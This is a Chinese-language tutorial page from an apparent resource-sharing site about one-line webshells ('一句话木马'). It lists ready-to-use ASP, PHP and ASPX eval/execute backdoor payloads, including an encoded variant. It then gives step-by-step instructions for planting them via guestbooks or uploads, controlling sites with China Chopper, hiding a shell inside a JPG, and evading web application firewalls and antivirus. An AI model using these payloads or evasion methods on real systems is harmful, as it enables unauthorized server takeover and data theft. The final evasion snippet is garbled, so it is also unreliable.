• 欢迎访问八荒岛资源网,致力于全国最好的商业源码论坛!------》》》 QQ群
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏八荒岛资源网吧------》》》 QQ群
  • 加入技术交流群------》》》 QQ群

一句话木马、中国菜刀、图片一句话制作、过狗一句话

技术教程 admin 1周前 (02-13) 30次浏览 已收录 0个评论

一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。

常用一句话木马
asp一句话木马:
<%execute(request(“value”))%>
php一句话木马:
<?php @eval($_POST[value]);?>
aspx一句话木马:
<%@ Page Language=“Jscript”%>
<%eval(Request.Item[“value”])%>
其他一句话木马:
<%eval request(“value”)%>
<%execute request(“value”)%>
<%execute(request(“value”))%>
<%If Request(“value”)<>”” Then Execute(Request(“value”))%>
<%if request (“value”)<>”“then session(“value”)=request(“value”):end if:if session(“value”)<>”” then execute session(“value”)%>

不用双引号的一句话木马:
<%eval request(chr(35))%>
UTF-7编码加密:
<%@ codepage=65000%><% response.Charset=”936″%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>

客户端:
一句话最常用的客户端为:
一句话客户端增强版
中国菜刀
lanker一句话客户端
ZV新型PHP一句话木马客户端GUI版

使用方法:
首先,找到数据库是asp格式的网站,然后,以留言板,或者发表文章的方式,把一句话添加到asp数据库,或者加进asp网页.
记住!我们的目的是把一句话<%execute request(“value”)%>添加到数据库,无论任何方式!
然后打开客户端(就是你电脑上面的那个htm文件),填上加入了一句话的asp文件,或者是asp网页,然后进入此网站服务器。

木马原理:
首先 < SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>是JavaScript脚本的开始标记,其中RUNAT属性的值SERVER表示脚本将在服务器端运行, 后面的eval是一句话木马的精华部分,使用eval方法的话它里面的字符串将会被执行,这样当脚本在服务器端运行的时候同时也执行了 Request.form(’#’)+’‘这句代码,Request.form(’#’)的作用是读取客户端文件中html标记属性中name值被命名 为#的部分。

关于错误:
服务器错误
经常,当我们在一个asp文件内添加了一句话后,就会出现类型不匹配的错误:
Script error detected at line 1.
Source line:execute request(“nettoo”)
Description:类型不匹配: ‘execute’

解决方法:
用”eval”替换掉”execute”服务端,就不会出错了。

中国菜刀与一句话木马
往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。
我们可以把一句话木马插入到网站上的某个asp/aspx/php文件上,或者直接创建一个新的文件,在里面写入这些语句,然后把文件上传到网站上即可。
打开中国菜刀,在空白处点击鼠标右键,选择“添加”选项。
编辑相关参数,包括一句话木马所在的URL及密码,最后点击“编辑。
在URL列表中选中目标网站,点击鼠标右键,选择“文件管理”,可以看到网站的目录结构。

图片一句话制作

如果网站限制了上传类型,.asp,.php上传不上出,但是可以上传图片,那么就可以使用图片隐写术将一句话木马安插在图片里,具体操作步骤是:
首先准备好一张图片,一个一句话木马,以及同路径下的dos窗口

一句话木马、中国菜刀、图片一句话制作、过狗一句话

然后输入DOS命令:copy 1.jpg/b + 1.php/a 2.jpg
此时产生的2.jpg就是我们要的图片一句话木马。

其他类型的一句话木马也是一样的使用方法。当然,一般网站不可能这么容易就上传,肯定有防护机制,比方说安全狗防护。

PHP一句话过狗、卫士、D盾等免杀思路!
1.关键字拆分。
比如assert,可以写成 ‘a’.’ss’.’e’.’r’.’t’这样。
这种方法虽然简单,但是却没有太强的免杀功效,需要结合其他方法

2.可变变量、引用、可变函数。
可变变量 比如a= a=a=_POST[‘x’];b=’a’;@eval( b=’a’;@eval(b=’a’;@eval($b);
————————————————


资源均来自网络,仅供学习研究,如需运营请购买正版,如有侵权请联系客服删除
本站所有资源下载后请24小时内删除,如用于违法用途,或者商业用途,一律用于者承担!
转载请注明原文链接:一句话木马、中国菜刀、图片一句话制作、过狗一句话
喜欢 (0)

您必须 登录 才能发表评论!

在线客服
在线客服